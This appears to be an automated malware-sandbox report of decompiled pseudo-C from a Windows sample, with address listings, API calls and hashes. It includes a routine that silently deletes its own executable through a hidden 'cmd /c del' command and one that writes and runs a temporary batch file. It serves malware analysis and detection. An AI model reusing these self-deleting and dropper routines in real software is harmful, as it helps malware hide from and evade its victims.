                                                                                                                                                        												do {
                                                                                                                                                        													_t68 = 0x40ca48 + _t94 * 4;
                                                                                                                                                        													_t94 = _t94 + 1;
                                                                                                                                                        													__eflags = _t94 - _t77;
                                                                                                                                                        													 *_t68 = _t110;
                                                                                                                                                        													_t110 =  *_t68;
                                                                                                                                                        												} while (_t94 <= _t77);
                                                                                                                                                        												goto L56;
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        										_t69 = 0x40ca44 + _t84 * 4;
                                                                                                                                                        										while(1) {
                                                                                                                                                        											__eflags =  *_t69 - _t110;
                                                                                                                                                        											if( *_t69 == _t110) {
                                                                                                                                                        												goto L51;
                                                                                                                                                        											}
                                                                                                                                                        											_t93 = _t93 - 1;
                                                                                                                                                        											_t69 = _t69 - 4;
                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                        											if(_t93 > 0) {
                                                                                                                                                        												continue;
                                                                                                                                                        											}
                                                                                                                                                        											goto L51;
                                                                                                                                                        										}
                                                                                                                                                        										goto L51;
                                                                                                                                                        									}
                                                                                                                                                        									_t87 = _v32;
                                                                                                                                                        									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                        									if( *_t87 != 0x5a4d) {
                                                                                                                                                        										goto L59;
                                                                                                                                                        									}
                                                                                                                                                        									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                        									__eflags =  *_t71 - 0x4550;
                                                                                                                                                        									if( *_t71 != 0x4550) {
                                                                                                                                                        										goto L59;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                        									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                        										goto L59;
                                                                                                                                                        									}
                                                                                                                                                        									_t78 = _t76 - _t87;
                                                                                                                                                        									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                        									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                        									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                        										goto L59;
                                                                                                                                                        									}
                                                                                                                                                        									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                        									__eflags = _t78 - _t72;
                                                                                                                                                        									if(_t78 < _t72) {
                                                                                                                                                        										goto L46;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                        									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                        										goto L46;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                        									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                        										goto L20;
                                                                                                                                                        									}
                                                                                                                                                        									goto L46;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								goto L16;
                                                                                                                                                        							}
                                                                                                                                                        							while(1) {
                                                                                                                                                        								L16:
                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x40ca48 + _t58 * 4)) - _t110;
                                                                                                                                                        								if( *((intOrPtr*)(0x40ca48 + _t58 * 4)) == _t110) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								_t58 = _t58 + 1;
                                                                                                                                                        								__eflags = _t58 - _t81;
                                                                                                                                                        								if(_t58 < _t81) {
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        								goto L18;
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                        							if(_t58 <= 0) {
                                                                                                                                                        								goto L5;
                                                                                                                                                        							}
                                                                                                                                                        							 *0x40ca88 = 1;
                                                                                                                                                        							__eflags =  *0x40ca88;
                                                                                                                                                        							if( *0x40ca88 != 0) {
                                                                                                                                                        								goto L5;
                                                                                                                                                        							}
                                                                                                                                                        							__eflags =  *((intOrPtr*)(0x40ca48 + _t58 * 4)) - _t110;
                                                                                                                                                        							if( *((intOrPtr*)(0x40ca48 + _t58 * 4)) == _t110) {
                                                                                                                                                        								L32:
                                                                                                                                                        								_t100 = 0;
                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                        								if(_t58 < 0) {
                                                                                                                                                        									L34:
                                                                                                                                                        									 *0x40ca88 = 0;
                                                                                                                                                        									goto L5;
                                                                                                                                                        								} else {
                                                                                                                                                        									goto L33;
                                                                                                                                                        								}
                                                                                                                                                        								do {
                                                                                                                                                        									L33:
                                                                                                                                                        									_t90 = 0x40ca48 + _t100 * 4;
                                                                                                                                                        									_t100 = _t100 + 1;
                                                                                                                                                        									__eflags = _t100 - _t58;
                                                                                                                                                        									 *_t90 = _t110;
                                                                                                                                                        									_t110 =  *_t90;
                                                                                                                                                        								} while (_t100 <= _t58);
                                                                                                                                                        								goto L34;
                                                                                                                                                        							}
                                                                                                                                                        							_t25 = _t81 - 1; // -1
                                                                                                                                                        							_t58 = _t25;
                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                        							if(_t58 < 0) {
                                                                                                                                                        								L28:
                                                                                                                                                        								__eflags = _t81 - 0x10;
                                                                                                                                                        								if(_t81 < 0x10) {
                                                                                                                                                        									_t81 = _t81 + 1;
                                                                                                                                                        									__eflags = _t81;
                                                                                                                                                        									 *0x40ca40 = _t81;
                                                                                                                                                        								}
                                                                                                                                                        								_t28 = _t81 - 1; // 0x0
                                                                                                                                                        								_t58 = _t28;
                                                                                                                                                        								goto L32;
                                                                                                                                                        							} else {
                                                                                                                                                        								goto L25;
                                                                                                                                                        							}
                                                                                                                                                        							while(1) {
                                                                                                                                                        								L25:
                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x40ca48 + _t58 * 4)) - _t110;
                                                                                                                                                        								if( *((intOrPtr*)(0x40ca48 + _t58 * 4)) == _t110) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								_t58 = _t58 - 1;
                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                        								if(_t58 >= 0) {
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        								break;
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                        							if(__eflags >= 0) {
                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                        									goto L34;
                                                                                                                                                        								}
                                                                                                                                                        								goto L32;
                                                                                                                                                        							}
                                                                                                                                                        							goto L28;
                                                                                                                                                        						}
                                                                                                                                                        						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                        						__eflags = _t75 - _v8;
                                                                                                                                                        						if(_t75 < _v8) {
                                                                                                                                                        							goto L20;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _t75 - _t108;
                                                                                                                                                        						if(_t75 >= _t108) {
                                                                                                                                                        							goto L20;
                                                                                                                                                        						}
                                                                                                                                                        						goto L15;
                                                                                                                                                        					}
                                                                                                                                                        					L5:
                                                                                                                                                        					_t63 = 1;
                                                                                                                                                        					goto L60;
                                                                                                                                                        				} else {
                                                                                                                                                        					goto L3;
                                                                                                                                                        				}
                                                                                                                                                        			}




































                                                                                                                                                        0x004023df
                                                                                                                                                        0x004023e2
                                                                                                                                                        0x004023e8
                                                                                                                                                        0x00402406
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402406
                                                                                                                                                        0x004023f0
                                                                                                                                                        0x004023f9
                                                                                                                                                        0x004023ff
                                                                                                                                                        0x0040240e
                                                                                                                                                        0x00402411
                                                                                                                                                        0x00402414
                                                                                                                                                        0x0040241e
                                                                                                                                                        0x0040241e
                                                                                                                                                        0x00402420
                                                                                                                                                        0x00402423
                                                                                                                                                        0x00402425
                                                                                                                                                        0x00402425
                                                                                                                                                        0x00402427
                                                                                                                                                        0x0040242a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0040242c
                                                                                                                                                        0x0040242e
                                                                                                                                                        0x00402494
                                                                                                                                                        0x00402494
                                                                                                                                                        0x004025f2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004025f2
                                                                                                                                                        0x00402430
                                                                                                                                                        0x00402430
                                                                                                                                                        0x00402434
                                                                                                                                                        0x00402436
                                                                                                                                                        0x00402436
                                                                                                                                                        0x00402436
                                                                                                                                                        0x00402436
                                                                                                                                                        0x00402439
                                                                                                                                                        0x0040243a
                                                                                                                                                        0x0040243d
                                                                                                                                                        0x0040243d
                                                                                                                                                        0x00402441
                                                                                                                                                        0x00402445
                                                                                                                                                        0x00402453
                                                                                                                                                        0x00402453
                                                                                                                                                        0x0040245b
                                                                                                                                                        0x00402461
                                                                                                                                                        0x00402463
                                                                                                                                                        0x00402465
                                                                                                                                                        0x00402475
                                                                                                                                                        0x00402482
                                                                                                                                                        0x00402486
                                                                                                                                                        0x0040248b
                                                                                                                                                        0x0040248d
                                                                                                                                                        0x0040250b
                                                                                                                                                        0x0040250b
                                                                                                                                                        0x0040248f
                                                                                                                                                        0x0040248f
                                                                                                                                                        0x0040248f
                                                                                                                                                        0x0040250d
                                                                                                                                                        0x0040250f
                                                                                                                                                        0x004025f0
                                                                                                                                                        0x004025f0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402515
                                                                                                                                                        0x00402515
                                                                                                                                                        0x0040251c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402522
                                                                                                                                                        0x00402526
                                                                                                                                                        0x00402582
                                                                                                                                                        0x00402584
                                                                                                                                                        0x0040258c
                                                                                                                                                        0x0040258e
                                                                                                                                                        0x00402590
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402592
                                                                                                                                                        0x00402598
                                                                                                                                                        0x0040259a
                                                                                                                                                        0x0040259c
                                                                                                                                                        0x004025b1
                                                                                                                                                        0x004025b1
                                                                                                                                                        0x004025b3
                                                                                                                                                        0x004025e2
                                                                                                                                                        0x004025e9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004025e9
                                                                                                                                                        0x004025b7
                                                                                                                                                        0x004025b8
                                                                                                                                                        0x004025ba
                                                                                                                                                        0x004025bc
                                                                                                                                                        0x004025bc
                                                                                                                                                        0x004025be
                                                                                                                                                        0x004025c0
                                                                                                                                                        0x004025c2
                                                                                                                                                        0x004025d6
                                                                                                                                                        0x004025d6
                                                                                                                                                        0x004025d9
                                                                                                                                                        0x004025db
                                                                                                                                                        0x004025db
                                                                                                                                                        0x004025dc
                                                                                                                                                        0x004025dc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004025c4
                                                                                                                                                        0x004025c4
                                                                                                                                                        0x004025c4
                                                                                                                                                        0x004025cd
                                                                                                                                                        0x004025ce
                                                                                                                                                        0x004025d0
                                                                                                                                                        0x004025d2
                                                                                                                                                        0x004025d2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004025c4
                                                                                                                                                        0x004025c2
                                                                                                                                                        0x0040259e
                                                                                                                                                        0x004025a5
                                                                                                                                                        0x004025a5
                                                                                                                                                        0x004025a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004025a9
                                                                                                                                                        0x004025aa
                                                                                                                                                        0x004025ad
                                                                                                                                                        0x004025af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004025af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004025a5
                                                                                                                                                        0x00402528
                                                                                                                                                        0x0040252b
                                                                                                                                                        0x00402530
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402539
                                                                                                                                                        0x0040253b
                                                                                                                                                        0x00402541
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402547
                                                                                                                                                        0x0040254d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402553
                                                                                                                                                        0x00402555
                                                                                                                                                        0x0040255e
                                                                                                                                                        0x00402562
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402568
                                                                                                                                                        0x0040256b
                                                                                                                                                        0x0040256d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402574
                                                                                                                                                        0x00402576
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402578
                                                                                                                                                        0x0040257c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0040257c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402467
                                                                                                                                                        0x00402467
                                                                                                                                                        0x00402467
                                                                                                                                                        0x0040246e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402470
                                                                                                                                                        0x00402471
                                                                                                                                                        0x00402473
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402473
                                                                                                                                                        0x0040249b
                                                                                                                                                        0x0040249d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004024ad
                                                                                                                                                        0x004024af
                                                                                                                                                        0x004024b1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004024b7
                                                                                                                                                        0x004024be
                                                                                                                                                        0x004024ea
                                                                                                                                                        0x004024ea
                                                                                                                                                        0x004024ec
                                                                                                                                                        0x004024ee
                                                                                                                                                        0x00402502
                                                                                                                                                        0x00402504
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004024f0
                                                                                                                                                        0x004024f0
                                                                                                                                                        0x004024f0
                                                                                                                                                        0x004024f9
                                                                                                                                                        0x004024fa
                                                                                                                                                        0x004024fc
                                                                                                                                                        0x004024fe
                                                                                                                                                        0x004024fe
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004024f0
                                                                                                                                                        0x004024c0
                                                                                                                                                        0x004024c0
                                                                                                                                                        0x004024c3
                                                                                                                                                        0x004024c5
                                                                                                                                                        0x004024d7
                                                                                                                                                        0x004024d7
                                                                                                                                                        0x004024da
                                                                                                                                                        0x004024dc
                                                                                                                                                        0x004024dc
                                                                                                                                                        0x004024dd
                                                                                                                                                        0x004024dd
                                                                                                                                                        0x004024e3
                                                                                                                                                        0x004024e3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004024c7
                                                                                                                                                        0x004024c7
                                                                                                                                                        0x004024c7
                                                                                                                                                        0x004024ce
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004024d0
                                                                                                                                                        0x004024d0
                                                                                                                                                        0x004024d1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004024d1
                                                                                                                                                        0x004024d3
                                                                                                                                                        0x004024d5
                                                                                                                                                        0x004024e8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004024e8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004024d5
                                                                                                                                                        0x00402447
                                                                                                                                                        0x0040244a
                                                                                                                                                        0x0040244d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0040244f
                                                                                                                                                        0x00402451
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00402451
                                                                                                                                                        0x00402416
                                                                                                                                                        0x00402418
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00402486
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MemoryQueryVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2850889275-0
                                                                                                                                                        • Opcode ID: f9c3cbb48b04890cef3d0b772ea0497b1f6544a303a3fc7f5fa205ebe5b51a17
                                                                                                                                                        • Instruction ID: 7ccd08600bdc185a24cac123c63fa4f67c48465fecb54ce8224498073b575e35
                                                                                                                                                        • Opcode Fuzzy Hash: f9c3cbb48b04890cef3d0b772ea0497b1f6544a303a3fc7f5fa205ebe5b51a17
                                                                                                                                                        • Instruction Fuzzy Hash: FB61C530700515ABDB29CF29DFE862673A5FB95314B24813BD806F72D5E7B8D8429B4C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                        			E004094F5(void* __eflags) {
                                                                                                                                                        				struct _SHELLEXECUTEINFOW _v64;
                                                                                                                                                        				char _v4158;
                                                                                                                                                        				short _v4160;
                                                                                                                                                        				void _v8256;
                                                                                                                                                        				short _v12352;
                                                                                                                                                        				int _t27;
                                                                                                                                                        				long _t53;
                                                                                                                                                        
                                                                                                                                                        				L0040A3DA();
                                                                                                                                                        				_v4160 = 0;
                                                                                                                                                        				E00402647( &_v4158, 0, 0xffe);
                                                                                                                                                        				_t27 = GetModuleFileNameW(0,  &_v8256, 0x800);
                                                                                                                                                        				if(_t27 != 0) {
                                                                                                                                                        					_t27 = GetEnvironmentVariableW(L"COMSPEC",  &_v12352, 0x800);
                                                                                                                                                        					if(_t27 != 0) {
                                                                                                                                                        						lstrcatW( &_v4160, L"/c del ");
                                                                                                                                                        						lstrcatW( &_v4160,  &_v8256);
                                                                                                                                                        						lstrcatW( &_v4160, L" > nul");
                                                                                                                                                        						_v64.cbSize = 0x3c;
                                                                                                                                                        						_v64.lpFile =  &_v12352;
                                                                                                                                                        						_v64.lpParameters =  &_v4160;
                                                                                                                                                        						_t53 = 0x40;
                                                                                                                                                        						_v64.hwnd = 0;
                                                                                                                                                        						_v64.lpVerb = L"Open";
                                                                                                                                                        						_v64.lpDirectory = 0;
                                                                                                                                                        						_v64.nShow = 0;
                                                                                                                                                        						_v64.fMask = lstrcatW;
                                                                                                                                                        						_t27 = ShellExecuteExW( &_v64);
                                                                                                                                                        						if(_t27 != 0) {
                                                                                                                                                        							SetPriorityClass(_v64.hProcess, _t53);
                                                                                                                                                        							_push(0x100);
                                                                                                                                                        							SetPriorityClass(GetCurrentProcess(), 0);
                                                                                                                                                        							_push(0xf);
                                                                                                                                                        							SetThreadPriority(GetCurrentThread(), 0);
                                                                                                                                                        							SHChangeNotify(4, 5,  &_v8256, 0);
                                                                                                                                                        							_t27 = 1;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				return _t27;
                                                                                                                                                        			}










                                                                                                                                                        0x004094fd
                                                                                                                                                        0x0040950d
                                                                                                                                                        0x0040951c
                                                                                                                                                        0x00409532
                                                                                                                                                        0x0040953a
                                                                                                                                                        0x0040954d
                                                                                                                                                        0x00409555
                                                                                                                                                        0x0040956d
                                                                                                                                                        0x0040957d
                                                                                                                                                        0x0040958b
                                                                                                                                                        0x00409593
                                                                                                                                                        0x0040959a
                                                                                                                                                        0x004095a5
                                                                                                                                                        0x004095ab
                                                                                                                                                        0x004095ad
                                                                                                                                                        0x004095b0
                                                                                                                                                        0x004095b7
                                                                                                                                                        0x004095ba
                                                                                                                                                        0x004095bd
                                                                                                                                                        0x004095c0
                                                                                                                                                        0x004095c8
                                                                                                                                                        0x004095d4
                                                                                                                                                        0x004095d6
                                                                                                                                                        0x004095e3
                                                                                                                                                        0x004095e5
                                                                                                                                                        0x004095ef
                                                                                                                                                        0x00409601
                                                                                                                                                        0x00409609
                                                                                                                                                        0x00409609
                                                                                                                                                        0x004095c8
                                                                                                                                                        0x00409555
                                                                                                                                                        0x0040960f

                                                                                                                                                        APIs
                                                                                                                                                        • _chkstk.NTDLL ref: 004094FD
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00409532
                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(COMSPEC,?,00000800), ref: 0040954D
                                                                                                                                                        • lstrcatW.KERNEL32(?,/c del ), ref: 0040956D
                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0040957D
                                                                                                                                                        • lstrcatW.KERNEL32(?, > nul), ref: 0040958B
                                                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 004095C0
                                                                                                                                                        • SetPriorityClass.KERNEL32(?,00000040), ref: 004095D4
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000100), ref: 004095DC
                                                                                                                                                        • SetPriorityClass.KERNEL32(00000000), ref: 004095E3
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 004095E8
                                                                                                                                                        • SetThreadPriority.KERNEL32(00000000), ref: 004095EF
                                                                                                                                                        • SHChangeNotify.SHELL32(00000004,00000005,?,00000000), ref: 00409601
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Prioritylstrcat$ClassCurrentThread$ChangeEnvironmentExecuteFileModuleNameNotifyProcessShellVariable_chkstk
                                                                                                                                                        • String ID: > nul$/c del $<$COMSPEC$Open
                                                                                                                                                        • API String ID: 2509851272-637544457
                                                                                                                                                        • Opcode ID: fdc018fdee9f032d7b84185f52c20d9aad9f7b0537a580a20411810a7dceeeb0
                                                                                                                                                        • Instruction ID: bc690c22b93cd99f296628dbbff0fce2cf62900fcb0459d3dc314e86236fffd3
                                                                                                                                                        • Opcode Fuzzy Hash: fdc018fdee9f032d7b84185f52c20d9aad9f7b0537a580a20411810a7dceeeb0
                                                                                                                                                        • Instruction Fuzzy Hash: BC31EF71D00258AAEB21DBA1DD48EDEBBBCEF45790F0040A7B545F2190D6B49A84CF68
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                        			E00409435() {
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				WCHAR* _t2;
                                                                                                                                                        				void* _t6;
                                                                                                                                                        				void* _t11;
                                                                                                                                                        				WCHAR* _t12;
                                                                                                                                                        				WCHAR* _t14;
                                                                                                                                                        
                                                                                                                                                        				_t12 = E00402779(0x1000);
                                                                                                                                                        				_t2 = E00402779(0x1000);
                                                                                                                                                        				_pop(_t11);
                                                                                                                                                        				_t14 = _t2;
                                                                                                                                                        				GetTempPathW(0x800, _t14);
                                                                                                                                                        				GetTempFileNameW(_t14, "tmp", 0, _t12);
                                                                                                                                                        				lstrcatW(_t12, L".bat");
                                                                                                                                                        				_t6 = CreateFileW(_t12, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                        				_t15 = _t6 - 0xffffffff;
                                                                                                                                                        				if(_t6 != 0xffffffff) {
                                                                                                                                                        					_push(_t6);
                                                                                                                                                        					_push(0x20);
                                                                                                                                                        					_push(0x401124);
                                                                                                                                                        					_push(0x1d0);
                                                                                                                                                        					_push(0x401358);
                                                                                                                                                        					E00408B05(0, _t11, _t12, _t14, _t15);
                                                                                                                                                        					return E004092F1(_t12);
                                                                                                                                                        				}
                                                                                                                                                        				return _t6;
                                                                                                                                                        			}











                                                                                                                                                        0x00409444
                                                                                                                                                        0x00409446
                                                                                                                                                        0x0040944c
                                                                                                                                                        0x0040944d
                                                                                                                                                        0x00409455
                                                                                                                                                        0x00409465
                                                                                                                                                        0x00409471
                                                                                                                                                        0x00409487
                                                                                                                                                        0x0040948d
                                                                                                                                                        0x00409490
                                                                                                                                                        0x00409492
                                                                                                                                                        0x00409493
                                                                                                                                                        0x00409495
                                                                                                                                                        0x0040949a
                                                                                                                                                        0x0040949f
                                                                                                                                                        0x004094a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004094aa
                                                                                                                                                        0x004094b2

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00402779: GetProcessHeap.KERNEL32(00000000,?,00409C7C,00000020,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000210,00401124,00000020,00000000,?,?,?,?,00409F25), ref: 0040277F
                                                                                                                                                          • Part of subcall function 00402779: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,00409F25), ref: 00402786
                                                                                                                                                        • GetTempPathW.KERNEL32(00000800,00000000,00000000,0000000A,00000000,00409F17,67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0), ref: 00409455
                                                                                                                                                        • GetTempFileNameW.KERNEL32(00000000,tmp,00000000,00000000), ref: 00409465
                                                                                                                                                        • lstrcatW.KERNEL32(00000000,.bat), ref: 00409471
                                                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00409487
                                                                                                                                                          • Part of subcall function 004092F1: CreateProcessW.KERNEL32 ref: 00409326
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFileHeapProcessTemp$AllocateNamePathlstrcat
                                                                                                                                                        • String ID: .bat$tmp
                                                                                                                                                        • API String ID: 1760470092-2801005570
                                                                                                                                                        • Opcode ID: a06ee4f1898a761c2c6937e2f2a1b2c10a7b43ea8183f70343a07e0bc5afca7a
                                                                                                                                                        • Instruction ID: e84bf3f35523ef96a30585cdfc3716a2ebb3c647fa722c8eda1beeb2bd53dffe
                                                                                                                                                        • Opcode Fuzzy Hash: a06ee4f1898a761c2c6937e2f2a1b2c10a7b43ea8183f70343a07e0bc5afca7a
                                                                                                                                                        • Instruction Fuzzy Hash: 41F09A722452107AE21122652D8AFBB252CDF86BAAF20013BF680F54E28ABC0C42127C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0040922B(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                        				signed int _v4;
                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                        				void* _t16;
                                                                                                                                                        				int _t22;
                                                                                                                                                        				int _t24;
                                                                                                                                                        				signed int _t28;
                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                        				signed int _t32;
                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                        				signed int _t37;
                                                                                                                                                        
                                                                                                                                                        				_t15 = _a8;
                                                                                                                                                        				_t28 = 0;
                                                                                                                                                        				_v4 = 0;
                                                                                                                                                        				_t37 = 0;
                                                                                                                                                        				_t32 = 0;
                                                                                                                                                        				_t30 = _t15;
                                                                                                                                                        				if(_t30 == 0) {
                                                                                                                                                        					_t32 =  *0x40caa0; // 0x19f05a8
                                                                                                                                                        					_t37 =  *0x40ca9c; // 0x2b
                                                                                                                                                        					L4:
                                                                                                                                                        					_v4 = _t32;
                                                                                                                                                        					L5:
                                                                                                                                                        					_t16 = _t15 - _t28;
                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                        						if(_t37 == 0) {
                                                                                                                                                        							L12:
                                                                                                                                                        							return 0;
                                                                                                                                                        						}
                                                                                                                                                        						while(CompareStringA(0x800, 1, _a4, 0xffffffff,  *(_t32 + _t28 * 4), 0xffffffff) != 2) {
                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                        							if(_t28 < _t37) {
                                                                                                                                                        								continue;
                                                                                                                                                        							}
                                                                                                                                                        							goto L12;
                                                                                                                                                        						}
                                                                                                                                                        						L18:
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        					if(_t16 == 1 && _t37 != 0) {
                                                                                                                                                        						do {
                                                                                                                                                        							_t22 = lstrlenA(_a4);
                                                                                                                                                        							if(_t22 < lstrlenA( *(_t32 + _t28 * 4))) {
                                                                                                                                                        								goto L11;
                                                                                                                                                        							}
                                                                                                                                                        							_t36 =  *(_t32 + _t28 * 4);
                                                                                                                                                        							_t24 = lstrlenA(_t36);
